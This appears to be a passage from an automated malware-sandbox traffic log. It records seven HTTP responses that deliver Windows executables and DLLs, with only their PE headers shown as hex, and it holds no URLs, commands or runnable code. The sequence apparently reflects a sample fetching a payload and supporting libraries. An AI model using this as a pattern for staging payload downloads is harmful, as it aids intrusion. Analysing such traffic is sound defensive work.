Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 11:49:08 GMTContent-Type: application/octet-streamContent-Length: 91648Last-Modified: Fri, 26 Jul 2024 11:16:06 GMTConnection: keep-aliveETag: "66a38576-16600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 62 05 40 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 0c 01 00 00 56 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 71 01 00 c8 00 00 00 00 90 01 00 9c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 2c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 f0 37 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 c2 d2 00 00 00 50 00 00 00 d4 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9d 33 00 00 00 30 01 00 00 34 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 17 00 00 00 70 01 00 00 12 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 9c 0f 00 00 00 90 01 00 00 10 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:49:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:49:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:49:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:49:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:49:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:49:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
